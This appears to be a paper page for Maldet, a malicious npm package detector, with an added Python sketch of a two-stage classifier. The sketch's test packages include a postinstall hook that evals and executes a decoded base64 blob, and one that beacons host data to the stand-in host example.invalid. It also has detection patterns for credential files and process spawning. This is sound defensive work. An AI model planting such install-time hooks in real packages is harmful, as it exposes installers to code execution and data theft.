Maldet: An Automated Malicious npm Package Detector Based on Behavior Characteristics and Attack Vectors

Published: 01 Jan 2024, Last Modified: 15 May 2025. Venue: TrustCom 2024. License: CC BY-SA 4.0
Abstract: With the growing number of software projects and the expansion of their functionality, more and more developers rely on third-party packages to speed up development and improve efficiency. Due to the openness of npm and the widespread use of Node.js, npm has become the largest open source software ecosystem and therefore a prime target for malicious attackers. Attackers use various attack vectors to publish new malicious packages or compromise existing benign ones, thereby threatening the software that depends on these packages. Detecting malicious npm packages is therefore of great significance for protecting users and building a more reliable and secure npm ecosystem.

We propose Maldet, an automated malicious npm package detection method. Maldet uses the malicious behavior pattern library we have built as its feature set and trains on known malicious and benign samples with four different classifiers. In addition, a supplementary detector performs a secondary check on packages classified as benign, reducing the number of false negatives. The results show that Maldet can detect each package in an average of just a few seconds with 97.12% accuracy, which is superior to other tools, providing both high accuracy and fast classification.
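To make the two-stage design in the abstract concrete, the following is an added illustration written for this page; it is not Maldet's code, and the behavior patterns, weights, threshold and sample packages are all constructed assumptions rather than the paper's pattern library or data. A primary stage scores behavior features extracted from `package.json` lifecycle scripts and JavaScript source (standing in for the trained classifiers), and a supplementary rule-based stage re-examines anything the primary stage called benign, looking for the attack-vector combination "code runs at install time and reaches the network or credentials".

```python
"""Two-stage behaviour-based npm package scoring (illustrative, not Maldet's code).
Every pattern, weight and sample package here is constructed for this example."""
import json
import re

# Assumed behaviour patterns over JavaScript source (hypothetical library).
SOURCE_PATTERNS = {
    "spawns_process": re.compile(r"require\(['\"]child_process['\"]\)"),
    "network_access": re.compile(r"require\(['\"](https?|net|dns)['\"]\)|\bfetch\("),
    "reads_env": re.compile(r"process\.env"),
    "reads_sensitive_files": re.compile(r"\.(ssh|npmrc|aws)\b"),
    "dynamic_eval": re.compile(r"\beval\(|new Function\("),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{80,}={0,2}"),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Assumed weights standing in for the paper's trained classifiers.
WEIGHTS = {
    "install_hook": 1.0, "hook_runs_script": 0.5, "spawns_process": 1.5,
    "network_access": 1.0, "reads_env": 0.5, "reads_sensitive_files": 1.5,
    "dynamic_eval": 1.5, "long_base64": 1.0,
}
PRIMARY_THRESHOLD = 3.0  # assumed cut-off for the primary stage


def extract_features(package_json: str, sources: dict) -> dict:
    """Boolean behaviour features for one package.

    package_json: the text of package.json; sources: {filename: JS source}.
    """
    meta = json.loads(package_json)
    scripts = meta.get("scripts", {})
    feats = {name: False for name in SOURCE_PATTERNS}
    feats["install_hook"] = any(h in scripts for h in INSTALL_HOOKS)
    # Lifecycle hooks that invoke node are a common execution trigger.
    hook_cmds = " ".join(scripts.get(h, "") for h in INSTALL_HOOKS)
    feats["hook_runs_script"] = bool(re.search(r"\bnode\b", hook_cmds))
    for src in sources.values():
        for name, pat in SOURCE_PATTERNS.items():
            if pat.search(src):
                feats[name] = True
    return feats


def primary_score(feats: dict) -> float:
    """Weighted sum of present features (classifier stand-in)."""
    return sum(WEIGHTS[name] for name, present in feats.items() if present)


def supplementary_check(feats: dict) -> bool:
    """Secondary detector: runs only on packages the primary stage passed.
    Flags install-time execution combined with network or credential access."""
    return feats["install_hook"] and (
        feats["network_access"] or feats["reads_sensitive_files"] or feats["reads_env"]
    )


def classify(package_json: str, sources: dict) -> dict:
    feats = extract_features(package_json, sources)
    score = primary_score(feats)
    if score >= PRIMARY_THRESHOLD:
        return {"verdict": "malicious", "stage": "primary", "score": score}
    if supplementary_check(feats):
        return {"verdict": "malicious", "stage": "supplementary", "score": score}
    return {"verdict": "benign", "stage": "primary", "score": score}


# Constructed sample packages (not real npm packages).
BENIGN_PKG = json.dumps({"name": "cfg-reader", "scripts": {"test": "node test.js"}})
BENIGN_SRC = {"index.js": "const fs = require('fs');\n"
              "module.exports = () => fs.readFileSync(process.env.CFG || 'config.json', 'utf8');"}

LOUD_PKG = json.dumps({"name": "loud-pkg", "scripts": {"postinstall": "node index.js"}})
LOUD_SRC = {"index.js": "const cp = require('child_process');\n"
            "const payload = Buffer.from('" + "QUJD" * 25 + "', 'base64').toString();\n"
            "eval(payload);\ncp.execSync(payload);"}

QUIET_PKG = json.dumps({"name": "quiet-pkg", "scripts": {"postinstall": "node setup.js"}})
QUIET_SRC = {"setup.js": "const https = require('https');\n"
             "https.get('https://example.invalid/ping?p=' + process.platform, () => {});"}

if __name__ == "__main__":
    for label, pkg, src in (("benign", BENIGN_PKG, BENIGN_SRC),
                            ("loud", LOUD_PKG, LOUD_SRC),
                            ("quiet", QUIET_PKG, QUIET_SRC)):
        print(label, classify(pkg, src))
```

The "quiet" sample is the case the abstract's supplementary detector exists for: its weighted score stays under the primary threshold, but the install hook plus outbound network access is enough for the secondary rule to flag it, which is how the second stage trades a little precision for fewer false negatives.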